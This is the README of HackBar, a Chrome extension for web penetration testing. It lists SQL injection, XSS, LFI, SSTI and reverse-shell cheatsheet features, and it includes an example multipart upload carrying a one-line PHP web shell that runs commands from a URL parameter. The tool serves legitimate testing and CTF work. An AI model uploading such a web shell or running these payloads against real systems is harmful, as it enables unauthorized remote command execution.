HackBar for Chrome.
Available on Chrome Web Store.
- tabs
- webRequest
- webRequestBlocking
-
Supported methods
- GET
- POST
- application/x-www-form-urlencoded
- multipart/form-data
- application/json
-
Auto Test
- Common paths (Wordlist from dirsearch included)
-
SQLi
- Dump all database names (MySQL, PostgreSQL)
- Dump tables from database (MySQL, PostgreSQL, SQLite)
- Dump columns from database (MySQL, PostgreSQL, SQLite)
- Union select statement (MySQL, PostgreSQL, SQLite)
- Error-based injection statement (MySQL, PostgreSQL)
- Dump in one shot payload (MySQL)
- Dump current query payload (MySQL)
- Space to Inline comment
-
XSS
- Vue.js XSS payloads
- Angular.js XSS payloads for strict CSP
- Some snippets for CTF
- Html encode/decode with hex/dec/entity name
- String.fromCharCode encode/decode
-
LFI
- PHP wrapper - Base64
-
SSTI
- Jinja2 SSTI (Flask RCE Reference)
- Java SSTI
-
Shell
- Python reverse shell cheatsheet
- bash reverse shell cheatsheet
- nc reverse shell cheatsheet
- php reverse shell/web shell cheatsheet
-
Encoding
- URL encode/decode
- Base64 encode/decode
- Hexadecimal encode/decode
- Unicode encode/decode
- Escape ASCII to hex/oct format
-
Hashing
- MD5
- SHA1
- SHA256
- SHA512
- Open Developer tools (Press
F12
orCtrl + Shift + I
) - Switch to HackBar tab
- Enjoy it
Description | Default | Mac |
---|---|---|
Load | Alt + A |
Control + A |
Split | Alt + S |
Control + S |
Execute | Alt + X |
Control + X |
After changing enctype field to multipart/form-data
, you can put your payload into Body field such as the following:
------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="user"
user
------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php
<?php passthru($_GET['c']); ?>
------WebKitFormBoundarydbJBATDXCC6CL0lZ--
We will consider the first line as boundary, and reconstruct a form element to send your request.
Therefore, sent boundary will not be the same as your typed.
After changing enctype field to application/json
, you can put your payload into Body field such as the following:
{
"username": "admin",
"password": "admin"
}
If your payload doesn't contain =
:
In order to post JSON data, we will insert a dummy field or object to your JSON such as the following:
{"username":"admin","password":"admin","4dxnzjzd5mi":"="}
For more details, please visit "Posting JSON with an HTML Form".
- Vue.js
- Vuetify.js
- crypto-js